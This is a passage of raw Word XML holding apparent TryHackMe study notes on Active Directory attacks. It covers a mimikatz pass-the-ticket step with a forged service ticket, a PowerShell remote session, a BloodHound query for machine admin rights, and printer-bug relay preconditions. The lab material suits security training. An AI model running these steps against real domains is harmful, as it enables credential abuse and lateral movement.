          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="BAC8D4"/>
          <w:shd w:val="clear" w:color="auto" w:fill="282C33"/>
        </w:rPr>
        <w:t>tgt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="BAC8D4"/>
          <w:shd w:val="clear" w:color="auto" w:fill="282C33"/>
        </w:rPr>
        <w:t>:[Delegated-Service-User]@[TGT-created—in-prev-Step.kirbi] /user:[victim-domain-user] /service:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="glossary-term"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="BAC8D4"/>
          <w:shd w:val="clear" w:color="auto" w:fill="282C33"/>
        </w:rPr>
        <w:t>[service-name”http</w:t>
      </w:r>
      <w:r w:rsidR="00736675">
        <w:rPr>
          <w:rStyle w:val="glossary-term"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="BAC8D4"/>
          <w:shd w:val="clear" w:color="auto" w:fill="282C33"/>
        </w:rPr>
        <w:t xml:space="preserve"> or wsman</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="glossary-term"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="BAC8D4"/>
          <w:shd w:val="clear" w:color="auto" w:fill="282C33"/>
        </w:rPr>
        <w:t>”]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="BAC8D4"/>
          <w:shd w:val="clear" w:color="auto" w:fill="282C33"/>
        </w:rPr>
        <w:t>/[Server-name].[Domain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="BAC8D4"/>
          <w:shd w:val="clear" w:color="auto" w:fill="282C33"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="091E6E1E" w14:textId="5FFD2D0D" w:rsidR="004126A1" w:rsidRDefault="00736675" w:rsidP="004126A1">
      <w:r>
        <w:tab/>
        <w:t>Now We have TGS for victim user for specific Service “http” or “wsman”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B68130A" w14:textId="70C162B1" w:rsidR="00736675" w:rsidRDefault="00736675" w:rsidP="004126A1">
      <w:r>
        <w:tab/>
        <w:t>Now Make Path the Ticket Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE11C9D" w14:textId="2BD7C3C8" w:rsidR="00736675" w:rsidRDefault="00736675" w:rsidP="004126A1">
      <w:r>
        <w:tab/>
        <w:t>Suppose We get wsman Ticket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9797FB" w14:textId="77777777" w:rsidR="00736675" w:rsidRDefault="00736675" w:rsidP="00736675">
      <w:pPr>
        <w:pStyle w:val="code2"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00736675">
        <w:t>mimikatz # privilege::debug</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557A7C53" w14:textId="5EB3D059" w:rsidR="00736675" w:rsidRDefault="00736675" w:rsidP="00736675">
      <w:pPr>
        <w:pStyle w:val="code2"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00736675">
        <w:t>mimikatz # kerberos::ptt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00736675">
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:t>compromised-user-TGS.kirbi]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32815E49" w14:textId="078F9907" w:rsidR="004126A1" w:rsidRDefault="00736675" w:rsidP="00736675">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00736675">
        <w:t>reate our PSSession on</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Server that have the services [</w:t>
      </w:r>
      <w:r w:rsidRPr="00736675">
        <w:t>THMSERVER</w:t>
      </w:r>
      <w:r>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE261CF" w14:textId="77777777" w:rsidR="00736675" w:rsidRDefault="00736675" w:rsidP="00736675">
      <w:pPr>
        <w:pStyle w:val="code2"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00736675">
        <w:t>mimikatz # exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC2C3FD" w14:textId="2C1D5F6B" w:rsidR="00736675" w:rsidRDefault="00736675" w:rsidP="00736675">
      <w:pPr>
        <w:pStyle w:val="code2"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00736675">
        <w:t xml:space="preserve">PS C:&gt; New-PSSession </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00736675">
        <w:t xml:space="preserve">-ComputerName </w:t>
      </w:r>
      <w:r>
        <w:t>[server-name]</w:t>
      </w:r>
      <w:r w:rsidRPr="00736675">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t>[Domain]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2A449B" w14:textId="5C75FAC5" w:rsidR="00736675" w:rsidRDefault="00736675" w:rsidP="00736675">
      <w:pPr>
        <w:pStyle w:val="code2"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00736675">
        <w:t>PS C:\&gt; Enter-PSSession -ComputerName thmserver1.za.tryhackme.loc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B57FDFD" w14:textId="77777777" w:rsidR="004126A1" w:rsidRDefault="004126A1" w:rsidP="004126A1"/>
    <w:p w14:paraId="1F4A2A12" w14:textId="77777777" w:rsidR="00B9025E" w:rsidRDefault="00B9025E" w:rsidP="004126A1"/>
    <w:p w14:paraId="623CE528" w14:textId="77777777" w:rsidR="00B9025E" w:rsidRDefault="00B9025E" w:rsidP="004126A1"/>
    <w:p w14:paraId="31233952" w14:textId="77777777" w:rsidR="00B9025E" w:rsidRDefault="00B9025E" w:rsidP="004126A1"/>
    <w:p w14:paraId="485B4B02" w14:textId="77777777" w:rsidR="00B9025E" w:rsidRDefault="00B9025E" w:rsidP="004126A1"/>
    <w:p w14:paraId="0F2CAB3F" w14:textId="77777777" w:rsidR="00B9025E" w:rsidRDefault="00B9025E" w:rsidP="004126A1"/>
    <w:p w14:paraId="28780589" w14:textId="77777777" w:rsidR="00945156" w:rsidRDefault="00945156" w:rsidP="004126A1"/>
    <w:p w14:paraId="07C29169" w14:textId="26C987EA" w:rsidR="00945156" w:rsidRPr="00945156" w:rsidRDefault="00945156" w:rsidP="00945156">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00945156">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exploiting Automated Relays</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665A2D10" w14:textId="64F24F98" w:rsidR="00326594" w:rsidRPr="00326594" w:rsidRDefault="00326594" w:rsidP="00326594">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00326594">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Machine Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348A1B90" w14:textId="1632A268" w:rsidR="00B9025E" w:rsidRDefault="00326594" w:rsidP="00326594">
      <w:r w:rsidRPr="00326594">
        <w:t>All Windows hosts have a machine account</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>By</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> default</w:t>
      </w:r>
      <w:r w:rsidRPr="00326594">
        <w:t xml:space="preserve"> passwords of these accounts are uncrackable. By default,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> if no one changes it</w:t>
      </w:r>
      <w:r w:rsidRPr="00326594">
        <w:t xml:space="preserve"> they are 120 characters (UTF16) long and are automatically rotated every 30 days.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC8AF8C" w14:textId="442092FF" w:rsidR="00B9025E" w:rsidRDefault="00326594" w:rsidP="00326594">
      <w:r>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidRPr="00326594">
        <w:t>omain controllers use their machine accounts to synchronize AD updates and changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7C586C" w14:textId="5D83ED32" w:rsidR="00B9025E" w:rsidRDefault="00326594" w:rsidP="00326594">
      <w:r w:rsidRPr="00326594">
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidRPr="00326594">
        <w:t>n AD, where one machine has admin rights over another machine</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> i</w:t>
      </w:r>
      <w:r w:rsidRPr="00326594">
        <w:t>n the AD configuration, administrative permissions over a host have been granted to another host.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA79AC6" w14:textId="485997C2" w:rsidR="00B9025E" w:rsidRDefault="00326594" w:rsidP="004126A1">
      <w:r>
        <w:t xml:space="preserve">To See Machines That </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>has</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Administrative Access to </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>other</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>machine</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> using Bloodhound:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EAF9A47" w14:textId="71FF9D0F" w:rsidR="00326594" w:rsidRDefault="00326594" w:rsidP="00326594">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00326594">
        <w:rPr>
          <w:color w:val="3A7C22" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:t>"Create Custom Query" in the Analysis tab in Bloodhound</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33365686" w14:textId="77777777" w:rsidR="00665076" w:rsidRPr="00665076" w:rsidRDefault="00665076" w:rsidP="00665076">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00665076">
        <w:t>write the following query:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A232F6" w14:textId="77777777" w:rsidR="00665076" w:rsidRPr="00665076" w:rsidRDefault="00665076" w:rsidP="00665076">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:color w:val="3A7C22" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00665076">
        <w:rPr>
          <w:color w:val="3A7C22" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:t>MATCH p=(c</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00665076">
        <w:rPr>
          <w:color w:val="3A7C22" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:t>1:Computer</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00665076">
        <w:rPr>
          <w:color w:val="3A7C22" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:t>)-[r</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00665076">
        <w:rPr>
          <w:color w:val="3A7C22" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:t>1:MemberOf</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00665076">
        <w:rPr>
          <w:color w:val="3A7C22" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00665076">
        <w:rPr>
          <w:color w:val="3A7C22" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:t>1..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00665076">
        <w:rPr>
          <w:color w:val="3A7C22" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:t>]-&gt;(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00665076">
        <w:rPr>
          <w:color w:val="3A7C22" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:t>g:Group</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00665076">
        <w:rPr>
          <w:color w:val="3A7C22" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:t>)-[r</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00665076">
        <w:rPr>
          <w:color w:val="3A7C22" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:t>2:AdminTo</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00665076">
        <w:rPr>
          <w:color w:val="3A7C22" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:t>]-&gt;(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00665076">
        <w:rPr>
          <w:color w:val="3A7C22" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:t>n:Computer</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00665076">
        <w:rPr>
          <w:color w:val="3A7C22" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:t>) RETURN p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69ED1D0B" w14:textId="5789F0DD" w:rsidR="00B9025E" w:rsidRDefault="00B9025E" w:rsidP="004126A1"/>
    <w:p w14:paraId="65E55613" w14:textId="77777777" w:rsidR="004051EB" w:rsidRDefault="004051EB" w:rsidP="004126A1"/>
    <w:p w14:paraId="7601C754" w14:textId="059CDF05" w:rsidR="00B9025E" w:rsidRDefault="004051EB" w:rsidP="004051EB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004051EB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Printer Bug</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A8A337" w14:textId="699E1F30" w:rsidR="004051EB" w:rsidRDefault="004051EB" w:rsidP="004051EB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004051EB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>It's not a bug, it's a feature - Microsoft.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1A2087" w14:textId="61F52A75" w:rsidR="004051EB" w:rsidRDefault="004051EB" w:rsidP="004051EB">
      <w:r w:rsidRPr="004051EB">
        <w:t>printer bug is a "feature" of the MS-RPRN protocol (</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Micro Soft </w:t>
      </w:r>
      <w:r w:rsidRPr="004051EB">
        <w:t>Print</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004051EB">
        <w:t>System Remote Protocol), which allows a domain user to remotely force a target host running the Print Spooler service to authenticate to an arbitrary IP address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F049D11" w14:textId="03E457C3" w:rsidR="004051EB" w:rsidRPr="004051EB" w:rsidRDefault="004051EB" w:rsidP="004051EB">
      <w:r w:rsidRPr="004051EB">
        <w:t xml:space="preserve">bugs in recent years: </w:t>
      </w:r>
      <w:r w:rsidRPr="004051EB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Spooler, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004051EB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PetitPotam</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004051EB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004051EB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PrintNightmare</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004051EB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>. Microsoft claims</w:t>
      </w:r>
      <w:r w:rsidRPr="004051EB">
        <w:t xml:space="preserve"> that the only bug is that some of these did not require AD credentials at all</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40540ABA" w14:textId="6ECAA32B" w:rsidR="004051EB" w:rsidRPr="004051EB" w:rsidRDefault="004051EB" w:rsidP="004051EB">
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="004051EB">
        <w:t>o exploit this</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="004051EB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004051EB">
        <w:t>need</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004051EB">
        <w:t xml:space="preserve"> to meet the following four </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004051EB">
        <w:t>conditions :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="732C62C0" w14:textId="77777777" w:rsidR="004051EB" w:rsidRPr="004051EB" w:rsidRDefault="004051EB" w:rsidP="004051EB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004051EB">
        <w:t>A valid set of AD account credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D55025" w14:textId="77777777" w:rsidR="004051EB" w:rsidRPr="004051EB" w:rsidRDefault="004051EB" w:rsidP="004051EB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004051EB">
        <w:t>Network connectivity to the target's SMB service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A706099" w14:textId="77777777" w:rsidR="004051EB" w:rsidRPr="004051EB" w:rsidRDefault="004051EB" w:rsidP="004051EB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004051EB">
        <w:t>The target host must be running the Print Spooler service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4436C086" w14:textId="77777777" w:rsidR="004051EB" w:rsidRPr="004051EB" w:rsidRDefault="004051EB" w:rsidP="004051EB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004051EB">
        <w:t xml:space="preserve">The hosts must </w:t>
      </w:r>
      <w:r w:rsidRPr="004345E3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r w:rsidRPr="004051EB">
        <w:t xml:space="preserve"> have SMB </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004051EB">
        <w:t>signing</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004051EB">
        <w:t xml:space="preserve"> enforced.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3022005A" w14:textId="55185870" w:rsidR="00B9025E" w:rsidRDefault="004051EB" w:rsidP="004051EB">
      <w:r w:rsidRPr="004051EB">
        <w:t xml:space="preserve">Condition 1 and 2 have been met already. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004051EB">
        <w:t>we</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004051EB">
        <w:t xml:space="preserve"> need to ensure </w:t>
      </w:r>
      <w:r>
        <w:t>that</w:t>
      </w:r>
      <w:r w:rsidRPr="004051EB">
        <w:t xml:space="preserve"> conditions 3 and 4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ok</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A90D443" w14:textId="427F497F" w:rsidR="007E1186" w:rsidRPr="007E1186" w:rsidRDefault="007E1186" w:rsidP="007E1186">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E1186">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Print Spooler Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41483605" w14:textId="1F430E85" w:rsidR="00B9025E" w:rsidRDefault="004051EB" w:rsidP="004051EB">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Check </w:t>
      </w:r>
      <w:r w:rsidRPr="004051EB">
        <w:t>Print Spooler Service</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> for another PC in domain </w:t>
      </w:r>
      <w:r w:rsidRPr="004051EB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>from Domain Joined Device</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701639D4" w14:textId="1FB576EC" w:rsidR="007E1186" w:rsidRDefault="007E1186" w:rsidP="004051EB">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="007E1186">
        <w:t>use a WMI query</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="561F8DCE" w14:textId="6D079124" w:rsidR="00B9025E" w:rsidRDefault="004051EB" w:rsidP="004051EB">
      <w:pPr>
        <w:pStyle w:val="code2"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="004051EB">
        <w:t>PS C:\&gt; GWMI Win32_Printer -Computer thmserver2.za.tryhackme.loc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23ABBCF4" w14:textId="60D01900" w:rsidR="004051EB" w:rsidRDefault="004051EB" w:rsidP="004051EB">
      <w:pPr>
        <w:pStyle w:val="code2"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="004051EB">
        <w:t>Get-PrinterPort -ComputerName thmserver2.za.tryhackme.loc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> #to ensure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7088A865" w14:textId="7584FFA9" w:rsidR="007E1186" w:rsidRDefault="007E1186" w:rsidP="007E1186">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Second Command may </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>be get</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> denied error, this Bec Microsoft prevent tis info thorough the network access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B62B6CD" w14:textId="45B12D5E" w:rsidR="00B9025E" w:rsidRDefault="00B9025E" w:rsidP="004126A1"/>
    <w:p w14:paraId="21FCCA19" w14:textId="26C7535F" w:rsidR="007E1186" w:rsidRDefault="007E1186" w:rsidP="007E1186">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E1186">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SMB Signing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E5B44D" w14:textId="77777777" w:rsidR="004345E3" w:rsidRPr="004345E3" w:rsidRDefault="004345E3" w:rsidP="004345E3">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004345E3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>SMB Signing is a security feature used in the Server Message Block (SMB) protocol to ensure data integrity and prevent man-in-the-middle attacks by signing SMB packets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B42E675" w14:textId="77777777" w:rsidR="004345E3" w:rsidRPr="004345E3" w:rsidRDefault="004345E3" w:rsidP="004345E3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004345E3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">SMB Signing Allowed: </w:t>
      </w:r>
      <w:r w:rsidRPr="004345E3">
        <w:t>Means that SMB signing can be used if both parties (client and server) support it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E4028B" w14:textId="6F5675B2" w:rsidR="004345E3" w:rsidRPr="004345E3" w:rsidRDefault="004345E3" w:rsidP="004345E3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004345E3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">SMB Signing Enforced: </w:t>
      </w:r>
      <w:r w:rsidRPr="004345E3">
        <w:t>Requires that SMB signing must be used for all SMB communication, ensuring higher security.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E993E6" w14:textId="2DB0EDAF" w:rsidR="007E1186" w:rsidRDefault="007E1186" w:rsidP="004345E3">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">We need </w:t>
      </w:r>
      <w:r w:rsidRPr="007E1186">
        <w:t xml:space="preserve">SMB signing should not be </w:t>
      </w:r>
      <w:r w:rsidR="004345E3" w:rsidRPr="007E1186">
        <w:t>enforced</w:t>
      </w:r>
      <w:r w:rsidR="004345E3">
        <w:t xml:space="preserve"> or SMB signing </w:t>
      </w:r>
      <w:r w:rsidR="004345E3" w:rsidRPr="004345E3">
        <w:t>not support</w:t>
      </w:r>
      <w:r w:rsidR="004345E3">
        <w:t xml:space="preserve">ed; </w:t>
      </w:r>
      <w:r w:rsidR="004345E3" w:rsidRPr="004345E3">
        <w:t xml:space="preserve">SMB signing being allowed </w:t>
      </w:r>
      <w:r w:rsidR="004345E3">
        <w:t xml:space="preserve">is ok but </w:t>
      </w:r>
      <w:r w:rsidR="004345E3" w:rsidRPr="004345E3">
        <w:t>SMB signing</w:t>
      </w:r>
      <w:r w:rsidR="004345E3">
        <w:t xml:space="preserve"> not</w:t>
      </w:r>
      <w:r w:rsidR="004345E3" w:rsidRPr="004345E3">
        <w:t xml:space="preserve"> being enforced</w:t>
      </w:r>
      <w:r w:rsidR="004345E3">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16CAF915" w14:textId="77273C10" w:rsidR="004345E3" w:rsidRDefault="004C00EB" w:rsidP="004345E3">
      <w:r>
        <w:tab/>
